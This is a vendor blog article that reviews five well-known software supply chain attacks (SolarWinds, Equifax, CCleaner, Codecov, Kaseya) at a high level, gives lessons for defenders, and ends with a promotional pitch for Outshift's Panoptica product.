A software application is not a monolith. In addition to the code you write for your application, you’re leaning on what may be hundreds of dependency packages and libraries. Each one of those libraries has its own set of dependencies and was built with deployment tools before being pushed to repositories to be made available to you. 

These components—and everything that went into them—collectively represent your software supply chain. They are valuable assets essential to your software development process. The proper functioning of your software application hinges on these dependencies. 

Here’s the scary news: Each one represents a potential security vulnerability. 

Software supply chain attacks exploit vulnerabilities within a chain of dependencies to breach the entire system. Reports show supply chain attacks increased by over 200% from 2022 to 2023. Many exploitable vulnerabilities came from third-party and open-source dependencies.  

This article will examine several high-profile software supply chain attacks from recent years. We’ll cover how they hit their targets, the level of damage that resulted, and what key lessons we can learn from these incursions. 

Case Study #1: The SolarWinds Attack 

In September 2019, SolarWinds, a well-known network monitoring company, suffered one of the most significant cyberattacks in history, later known as the SUNBURST Attack. The wide-ranging victims of the breach included financial services, military contractors known to employ highly competent cybersecurity teams, and numerous U.S. federal agencies and departments. 

How it happened 

SolarWinds had an IT monitoring platform called Orion, and attackers used Remote Access Trojan malware to insert malicious code into Orion. The compromise of Orion—a piece of software used by approximately 18,000 organizations—had a cascading effect. The breach enabled threat actors to move laterally within networks and gain access to sensitive logs and data. 

FireEye, a cybersecurity company, discovered the breach in December 2020. You’ll recall that the cyberattack began in September 2019. The attack went undiscovered for over a year. 

Key lessons learned 

This incident triggered a paradigm shift in cybersecurity, forcing prominent corporations worldwide to move toward a zero trust architecture when allowing network access to third-party vendors.  

The fact that so many victims of this attack failed to detect this breach flagged serious shortcomings in cybersecurity solutions at the time. This example highlights the need for solutions that can bring real-time monitoring and anomaly detection. 

Case Study #2: The Equifax Breach 

Equifax is one of the largest credit reporting agencies in the U.S. In 2017, it suffered a significant data breach, exposing the personal data of nearly 150 million Americans to malicious actors.  

The severity of this incident resulted in calls for increased regulatory scrutiny, data protection laws, and reforms around data privacy. In the aftermath, Equifax suffered a massive stock selloff, serving as a dire warning to industry leaders: Do better to safeguard the data of users. 

How it happened 

The culprit was a vulnerability in the Apache Struts Java framework, allowing attackers to execute code on web servers running this framework by inserting code snippets into an HTTP request header. Inadequate network segmentation let attackers move easily from one server to another, significantly increasing the severity of the breach. 

To make it even worse, Equifax did not encrypt user credentials in their databases. Attackers were able to retrieve them in plaintext. 

This incident acted as a reminder that common vulnerabilities and exposures (CVEs), such as the Apache Struts vulnerability, are abundant. Reports show that as many as 50 new CVEs are discovered each day. It should come as no surprise that attackers regularly scan for newly reported CVEs too, and then they rush to exploit them. 

The patch for the Apache Struts vulnerability was released in March 2017, while the breach occurred between May and July of that same year. That means Equifax went at least two months without patching their systems with the readily available fix. 

Key lessons learned 

All systems require security patching—early and often. Organizations need tools to scan applications for existing and newly discovered CVEs. These scans should happen during the continuous integration and continuous delivery (CI/CD) build process to ensure that vulnerable software dependencies never make it to a production environment. Along with this, enforcing segmentation policies across network infrastructures and encryption of sensitive data—such as user credentials and passwords—are non-negotiable security best practices. 

Case Study #3: The CCleaner Incident 

In September 2017, attackers compromised CCleaner, a popular system optimization tool, by exploiting a vulnerability in the software’s compilation process to insert malware. 

How it happened 

More than two million users worldwide downloaded the tainted version of CCleaner. As a result, the attackers gained access to a large volume of sensitive user data. Researchers at Cisco Talos detected the breach and informed Avast, the owners of CCleaner. Avast promptly halted distribution of the compromised version and released a clean update, urging users to download the clean version as soon as possible. 

Key lessons learned 

This breach shows why users should exercise caution when downloading or updating software—even software from reputable vendors. When downloading any software or updates, users should use software with anomaly detection functionality to alert them to the suspicious behavior of any software components. 
 

Case Study #4: The Codecov Breach 

Codecov is a popular tool among software developers that tracks how much of a codebase is covered by tests. In January 2021, Codecov suffered a breach that impacted over 23,000 organizations using the software, including prominent tech companies such as Twilio and Hashicorp. Many industry experts compared it to the SUNBURST attack. 

How it happened 

Attackers exploited an error in a Codecov process for creating Docker images for its users as part of their CI/CD pipeline. By modifying a Bash script used in this Codecov process, attackers were able to acquire sensitive information—such as credentials and access tokens—from numerous organizations relying on Codecov as their coverage tool.  

The incident highlighted the potential vulnerabilities in every tool integrated into a software project's supply chain. Even seemingly non-critical tools like test coverage analysis utilities can serve as potential entry points for attackers. The Codecov breach also demonstrated how authentication credentials can easily fall into the wrong hands. 

Key lessons learned 

Given the large number of dependencies found in every software project, the early detection of a supply chain attack is critical. Organizations need mechanisms for early detection of unauthorized access attempts, allowing system administrators to respond to the threat rapidly.  

Tools that enforce zero trust and the principle of least privilege are essential. This way, even when authentication credentials are leaked, attackers are limited in the scope of their actions.  

Case Study #5: The Kaseya VSA Cyberattack 

In July 2021, Kaseya, a software company specializing in network and system monitoring tools, detected a potential security incident on its remote computer management tool, Kaseya VSA.  

Kaseya released a statement advising customers to halt both on-premises and SaaS servers running VSA until they could release a patch. Unfortunately, attackers had breached several of Kaseya’s customers and initiated ransomware demands. The severity of the incident led to the highest involvement of the U.S. government, even requiring the president’s attention.  

How it happened 

The Kaseya VSA Cyberattack exploited a zero-day vulnerability in the authentication process of the VSA server, allowing the attackers to execute arbitrary commands and deploy ransomware. By manipulating the server's functionality, attackers gained unauthorized access and executed a supply chain attack through a compromised software update mechanism. This breach resulted in widespread compromise of connected client systems. 

For more information about Outshift's CNAPP solution, Panoptica, and how it can protect your software supply chain, schedule a one-on-one live demo or contact Outshift today.